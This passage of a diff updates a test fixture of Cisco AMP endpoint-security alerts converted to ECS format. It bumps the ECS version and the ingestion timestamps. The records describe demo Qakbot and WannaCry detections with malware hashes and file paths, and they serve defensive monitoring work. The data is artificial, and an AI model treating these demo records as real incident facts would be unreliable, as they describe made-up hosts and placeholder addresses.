Detected\",\"event_type_id\":1090519054,\"detection\":\"W32.File.MalParent\",\"detection_id\":\"6411462918168117252\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"Medium\",\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_Qakbot_1\",\"external_ip\":\"8.8.8.8\",\"user\":\"user@testdomain.com\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"f9:65:da:22:2a:41\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"file_name\":\"MspthrdHash.exe\",\"file_path\":\"\\\\\\\\?\\\\C:\\\\Users\\\\johndoe\\\\AppData\\\\Local\\\\MspthrdHash\\\\MspthrdHash.exe\",\"identity\":{\"sha256\":\"dd6d4fedd34a4d0e5c62b0e6d8c734d157ee921e07cddc82251755bed0de3f91\",\"sha1\":\"75a94b8aa3b9a7c4de4f866b508111ac5a6f2b12\",\"md5\":\"a97fb86da4e010974860e5024137b56b\"}}}}", "kind": "alert", "action": "Threat Detected", @@ -739,7 +739,7 @@ } }, "ecs": { - "version": "1.11.0" + "version": "1.12.0" }, "related": { "hosts": [ @@ -763,7 +763,7 @@ }, "event": { "severity": 3, - "ingested": "2021-09-12T17:32:23.854004118Z", + "ingested": "2021-09-13T18:07:55.452487619Z", "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":6411456342573187000,\"timestamp\":1610627534,\"timestamp_nanoseconds\":589000000,\"date\":\"2021-01-14T12:32:14+00:00\",\"event_type\":\"Retrospective Detection\",\"event_type_id\":553648147,\"detection\":\"W32.GenericKD:Gen.20fu.1201\",\"detection_id\":\"6411456342573187074\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"High\",\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_Qakbot_1\",\"external_ip\":\"8.8.8.8\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"f9:65:da:22:2a:41\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"file_name\":\"11179468.exe\",\"file_path\":\"\\\\\\\\?\\\\C:\\\\Users\\\\johndoe\\\\AppData\\\\Local\\\\Temp\\\\11179468.exe\",\"identity\":{\"sha256\":\"0b965ca8afea0638749b71ec6ad53f94e8bd9f9b359f1cb2e707dbe52f5d3960\"}}}}", "kind": "alert", "action": "Retrospective Detection", @@ -818,7 +818,7 @@ } }, "ecs": { - "version": "1.11.0" + "version": "1.12.0" }, "related": { "hosts": [ @@ -842,7 +842,7 @@ }, "event": { "severity": 3, - "ingested": "2021-09-12T17:32:23.854006008Z", + "ingested": "2021-09-13T18:07:55.452489569Z", "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":6411456342573187000,\"timestamp\":1610627534,\"timestamp_nanoseconds\":558000000,\"date\":\"2021-01-14T12:32:14+00:00\",\"event_type\":\"Retrospective Detection\",\"event_type_id\":553648147,\"detection\":\"W32.12081E6CA3-95.SBX.TG\",\"detection_id\":\"6411456342573187073\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"High\",\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_Qakbot_1\",\"external_ip\":\"8.8.8.8\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"f9:65:da:22:2a:41\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"file_name\":\"AySxs.exe\",\"file_path\":\"\\\\\\\\?\\\\C:\\\\Users\\\\johndoe\\\\Documents\\\\AySxs.exe\",\"identity\":{\"sha256\":\"12081e6ca366ad7d08368fbc7d4107605a9b75d27c671e7e0a58588f94be5837\"}}}}", "kind": "alert", "action": "Retrospective Detection", @@ -902,7 +902,7 @@ } }, "ecs": { - "version": "1.11.0" + "version": "1.12.0" }, "related": { "hosts": [ @@ -922,7 +922,7 @@ }, "event": { "severity": 4, - "ingested": "2021-09-12T17:32:23.854008008Z", + "ingested": "2021-09-13T18:07:55.452491758Z", "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":1492784107692000800,\"timestamp\":1610627262,\"timestamp_nanoseconds\":692000000,\"date\":\"2021-01-14T12:27:42+00:00\",\"event_type\":\"Cloud IOC\",\"event_type_id\":1107296274,\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"Critical\",\"start_timestamp\":1610627262,\"start_date\":\"2021-01-14T12:27:42+00:00\",\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_Qakbot_1\",\"external_ip\":\"8.8.8.8\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"f9:65:da:22:2a:41\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"cloud_ioc\":{\"description\":\"Qakbot is a worm that spreads through network shares and removable drives. It downloads additional files, steals information, and opens a back door on the compromised computer. The worm also contains rootkit functionality to allow it to hide its presence. A command or file path similar to one used by Qakbot for spreading across the network or persistence was seen.\",\"short_description\":\"W32.Qakbot.ioc\"},\"file\":{\"disposition\":\"Clean\",\"file_name\":\"cmd.exe\",\"file_path\":\"/C:/Windows/SysWOW64/cmd.exe\",\"identity\":{\"sha256\":\"17f746d82695fa9b35493b41859d39d786d32b23a9d2e00f4011dec7a02402ae\"},\"parent\":{\"disposition\":\"Malicious\",\"identity\":{\"sha256\":\"8063af71d08d015cc102788491c6274d3d33290b8dc41f91cc511a36fa0cba75\"}}}}}", "kind": "alert", "start": "2021-01-14T12:27:42.000Z", @@ -982,7 +982,7 @@ } }, "ecs": { - "version": "1.11.0" + "version": "1.12.0" }, "related": { "hosts": [ @@ -1002,7 +1002,7 @@ }, "event": { "severity": 3, - "ingested": "2021-09-12T17:32:23.854009893Z", + "ingested": "2021-09-13T18:07:55.452493688Z", "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":1458626002840536600,\"timestamp\":1610627243,\"timestamp_nanoseconds\":268148295,\"date\":\"2021-01-14T12:27:23+00:00\",\"event_type\":\"Threat Detected in Low Prevalence Executable\",\"event_type_id\":1107296278,\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"High\",\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_Low_Prev_Retro\",\"external_ip\":\"8.8.8.8\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"df:d1:ed:2d:c8:fc\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"file_name\":\"report.pdf.exe\",\"identity\":{\"sha256\":\"d5221f6847978682234cb8ebfa951cb56b1323658679a820b168bbc1f5261a3b\"}}}}", "kind": "alert", "action": "Threat Detected in Low Prevalence Executable", @@ -1048,7 +1048,7 @@ { "@timestamp": "2021-01-14T12:19:10.000Z", "ecs": { - "version": "1.11.0" + "version": "1.12.0" }, "related": { "hosts": [ @@ -1066,7 +1066,7 @@ "event": { "severity": 0, "action": "Policy Update", - "ingested": "2021-09-12T17:32:23.854011760Z", + "ingested": "2021-09-13T18:07:55.452495638Z", "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":6583861114428195000,\"timestamp\":1610626750,\"timestamp_nanoseconds\":161000000,\"date\":\"2021-01-14T12:19:10+00:00\",\"event_type\":\"Policy Update\",\"event_type_id\":553648130,\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_AMP_MAP_FriedEx\",\"external_ip\":\"8.8.8.8\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"04:e6:4d:d5:7a:b5\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}}}}", "id": "6583861114428195000", "kind": "alert" @@ -1112,7 +1112,7 @@ } }, "ecs": { - "version": "1.11.0" + "version": "1.12.0" }, "related": { "hosts": [ @@ -1138,7 +1138,7 @@ }, "event": { "severity": 0, - "ingested": "2021-09-12T17:32:23.854013646Z", + "ingested": "2021-09-13T18:07:55.452497572Z", "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":6264747552596296000,\"timestamp\":1610626264,\"timestamp_nanoseconds\":27000000,\"date\":\"2021-01-14T12:11:04+00:00\",\"event_type\":\"File Fetch Completed\",\"event_type_id\":553648173,\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_Low_Prev_Retro\",\"external_ip\":\"8.8.8.8\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"df:d1:ed:2d:c8:fc\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"file_name\":\"report.pdf.exe\",\"file_path\":\"\\\\\\\\?\\\\C:\\\\Users\\\\rsteadman\\\\Downloads\\\\report.pdf.exe\",\"identity\":{\"sha256\":\"d5221f6847978682234cb8ebfa951cb56b1323658679a820b168bbc1f5261a3b\",\"sha1\":\"5058b16a86beee96927371210b9a9f682976a50a\",\"md5\":\"48a0bf05b9706a00d2a0ff6260412f11\"}}}}", "kind": "alert", "action": "File Fetch Completed", @@ -1202,7 +1202,7 @@ } }, "ecs": { - "version": "1.11.0" + "version": "1.12.0" }, "related": { "user": [ @@ -1234,7 +1234,7 @@ }, "event": { "severity": 2, - "ingested": "2021-09-12T17:32:23.854015534Z", + "ingested": "2021-09-13T18:07:55.452499476Z", "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":6411444887895409000,\"timestamp\":1610625778,\"timestamp_nanoseconds\":756000000,\"date\":\"2021-01-14T12:02:58+00:00\",\"event_type\":\"Threat Detected\",\"event_type_id\":1090519054,\"detection\":\"Auto.A280012EEE.in10.tht.Talos\",\"detection_id\":\"6411444887895408641\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"Medium\",\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_Qakbot_2\",\"external_ip\":\"8.8.8.8\",\"user\":\"user@testdomain.com\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"d1:e2:b6:61:ef:7a\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"file_name\":\"X4.exe\",\"file_path\":\"\\\\\\\\?\\\\C:\\\\Users\\\\johndoe\\\\Documents\\\\X4.exe\",\"identity\":{\"sha256\":\"a280012eeedb19a9b4a7ddfb3c4dca316ce96ad376d98092351529c4db052e62\",\"sha1\":\"c235e18bae63d6c4b5daadb833686f943de65a5f\",\"md5\":\"a659ff79ef7ffacbd61d4c2641379e44\"},\"parent\":{\"process_id\":4744,\"disposition\":\"Clean\",\"file_name\":\"wscript.exe\",\"identity\":{\"sha256\":\"9c8a1b52a638ca87a5e7e60e635a3cbf89b04f5888995f55e2ad3d94ab009b97\",\"sha1\":\"2131cff0959d213cd9a5e8a8ac362d265d5b1316\",\"md5\":\"045451fa238a75305cc26ac982472367\"}}}}}", "kind": "alert", "action": "Threat Detected", @@ -1291,7 +1291,7 @@ } }, "ecs": { - "version": "1.11.0" + "version": "1.12.0" }, "related": { "hosts": [ @@ -1311,7 +1311,7 @@ }, "event": { "severity": 2, - "ingested": "2021-09-12T17:32:23.854017516Z", + "ingested": "2021-09-13T18:07:55.452501462Z", "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":6411444887895409000,\"timestamp\":1610625778,\"timestamp_nanoseconds\":772000000,\"date\":\"2021-01-14T12:02:58+00:00\",\"event_type\":\"Threat Quarantined\",\"event_type_id\":553648143,\"detection_id\":\"6411444887895408641\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"Medium\",\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_Qakbot_2\",\"external_ip\":\"8.8.8.8\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"d1:e2:b6:61:ef:7a\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"identity\":{\"sha256\":\"a280012eeedb19a9b4a7ddfb3c4dca316ce96ad376d98092351529c4db052e62\"}}}}", "kind": "alert", "action": "Threat Quarantined", @@ -1362,7 +1362,7 @@ } }, "ecs": { - "version": "1.11.0" + "version": "1.12.0" }, "related": { "hosts": [ @@ -1382,7 +1382,7 @@ }, "event": { "severity": 2, - "ingested": "2021-09-12T17:32:23.854019384Z", + "ingested": "2021-09-13T18:07:55.452503367Z", "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":6419187549993959000,\"timestamp\":1610625537,\"timestamp_nanoseconds\":208000000,\"date\":\"2021-01-14T11:58:57+00:00\",\"event_type\":\"Quarantine Failure\",\"event_type_id\":2164260880,\"detection_id\":\"6419187549993959449\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"Medium\",\"error\":{\"error_code\":3221225524,\"description\":\"Object name not found\"},\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_WannaCry_Ransomware\",\"external_ip\":\"8.8.8.8\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"53:74:31:cb:37:50\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"identity\":{\"sha256\":\"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa\"}}}}", "kind": "alert", "action": "Quarantine Failure", @@ -1448,7 +1448,7 @@ } }, "ecs": { - "version": "1.11.0" + "version": "1.12.0" }, "related": { "user": [ @@ -1478,7 +1478,7 @@ }, "event": { "severity": 2, - "ingested": "2021-09-12T17:32:23.854021268Z", + "ingested": "2021-09-13T18:07:55.452505304Z", "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":6419187549993959000,\"timestamp\":1610625537,\"timestamp_nanoseconds\":193000000,\"date\":\"2021-01-14T11:58:57+00:00\",\"event_type\":\"Threat Detected\",\"event_type_id\":1090519054,\"detection\":\"W32.Variant:Gen.20gl.1201\",\"detection_id\":\"6419187549993959449\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"Medium\",\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_WannaCry_Ransomware\",\"external_ip\":\"8.8.8.8\",\"user\":\"user@testdomain.com\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"53:74:31:cb:37:50\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"file_name\":\"tasksche.exe\",\"file_path\":\"\\\\\\\\?\\\\C:\\\\WINDOWS\\\\tasksche.exe\",\"identity\":{\"sha256\":\"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa\"},\"parent\":{\"process_id\":2980,\"disposition\":\"Malicious\",\"file_name\":\"mssecsvc.exe\",\"identity\":{\"sha256\":\"24d004a104d4d54034dbcffc2a4b19a11f39008a575aa614ea04703480b1022c\",\"sha1\":\"e889544aff85ffaf8b0d0da705105dee7c97fe26\",\"md5\":\"db349b97c37d22f5ea1d1841e3c89eb4\"}}}}}", "kind": "alert", "action": "Threat Detected", @@ -1548,7 +1548,7 @@ } }, "ecs": { - "version": "1.11.0" + "version": "1.12.0" }, "related": { "user": [ @@ -1580,7 +1580,7 @@ }, "event": { "severity": 2, - "ingested": "2021-09-12T17:32:23.854023153Z", + "ingested": "2021-09-13T18:07:55.452507280Z", "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":6419187537109058000,\"timestamp\":1610625534,\"timestamp_nanoseconds\":853000000,\"date\":\"2021-01-14T11:58:54+00:00\",\"event_type\":\"Threat Detected\",\"event_type_id\":1090519054,\"detection\":\"W32.File.MalParent\",\"detection_id\":\"6419187537109057560\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"Medium\",\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_WannaCry_Ransomware\",\"external_ip\":\"8.8.8.8\",\"user\":\"user@testdomain.com\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"53:74:31:cb:37:50\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"file_name\":\"tasksche.exe\",\"file_path\":\"\\\\\\\\?\\\\C:\\\\Windows\\\\tasksche.exe\",\"identity\":{\"sha256\":\"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa\",\"sha1\":\"5ff465afaabcbf0150d1a3ab2c2e74f3a4426467\",\"md5\":\"84c82835a5d21bbcf75a61706d8ab549\"},\"parent\":{\"process_id\":2980,\"disposition\":\"Malicious\",\"file_name\":\"mssecsvc.exe\",\"identity\":{\"sha256\":\"24d004a104d4d54034dbcffc2a4b19a11f39008a575aa614ea04703480b1022c\",\"sha1\":\"e889544aff85ffaf8b0d0da705105dee7c97fe26\",\"md5\":\"db349b97c37d22f5ea1d1841e3c89eb4\"}}}}}", "kind": "alert", "action": "Threat Detected", @@ -1637,7 +1637,7 @@ } }, "ecs": { - "version": "1.11.0" + "version": "1.12.0" }, "related": { "hosts": [ @@ -1657,7 +1657,7 @@ }, "event": { "severity": 2, - "ingested": "2021-09-12T17:32:23.854025059Z", + "ingested": "2021-09-13T18:07:55.452509223Z", "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":6419187537109058000,\"timestamp\":1610625534,\"timestamp_nanoseconds\":884000000,\"date\":\"2021-01-14T11:58:54+00:00\",\"event_type\":\"Threat Quarantined\",\"event_type_id\":553648143,\"detection_id\":\"6419187537109057560\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"Medium\",\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_WannaCry_Ransomware\",\"external_ip\":\"8.8.8.8\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"53:74:31:cb:37:50\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"identity\":{\"sha256\":\"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa\"}}}}", "kind": "alert", "action": "Threat Quarantined", @@ -1703,7 +1703,7 @@ { "@timestamp": "2021-01-14T11:49:08.000Z", "ecs": { - "version": "1.11.0" + "version": "1.12.0" }, "related": { "hosts": [ @@ -1721,7 +1721,7 @@ "event": { "severity": 0, "action": "Policy Update", - "ingested": "2021-09-12T17:32:23.854026933Z", + "ingested": "2021-09-13T18:07:55.452511138Z", "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":6583853374897127000,\"timestamp\":1610624948,\"timestamp_nanoseconds\":562000000,\"date\":\"2021-01-14T11:49:08+00:00\",\"event_type\":\"Policy Update\",\"event_type_id\":553648130,\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_AMP_MAP_FriedEx\",\"external_ip\":\"8.8.8.8\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"04:e6:4d:d5:7a:b5\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}}}}", "id": "6583853374897127000", "kind": "alert" @@ -1768,7 +1768,7 @@ } }, "ecs": { - "version": "1.11.0" + "version": "1.12.0" }, "related": { "hosts": [ @@ -1788,7 +1788,7 @@ }, "event": { "severity": 3, - "ingested": "2021-09-12T17:32:23.854028807Z", + "ingested": "2021-09-13T18:07:55.452575444Z", "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":14945825043963,\"timestamp\":1610624472,\"timestamp_nanoseconds\":496121997,\"date\":\"2021-01-14T11:41:12+00:00\",\"event_type\":\"Executed malware\",\"event_type_id\":1107296272,\"detection\":\"W32.ED01EBFBC9-100.SBX.TG\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"High\",\"start_timestamp\":1610624472,\"start_date\":\"2021-01-14T11:41:12+00:00\",\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_WannaCry_Ransomware\",\"external_ip\":\"8.8.8.8\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"53:74:31:cb:37:50\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"identity\":{\"sha256\":\"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa\"},\"parent\":{\"disposition\":\"Malicious\",\"identity\":{\"sha256\":\"24d004a104d4d54034dbcffc2a4b19a11f39008a575aa614ea04703480b1022c\"}}}}}", "kind": "alert", "start": "2021-01-14T11:41:12.000Z", @@ -1849,7 +1849,7 @@ } }, "ecs": { - "version": "1.11.0" + "version": "1.12.0" }, "related": { "hosts": [ @@ -1869,7 +1869,7 @@ }, "event": { "severity": 3, - "ingested": "2021-09-12T17:32:23.854030779Z", + "ingested": "2021-09-13T18:07:55.452580334Z", "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":14945825043964,\"timestamp\":1610624472,\"timestamp_nanoseconds\":498576872,\"date\":\"2021-01-14T11:41:12+00:00\",\"event_type\":\"Multiple Infected 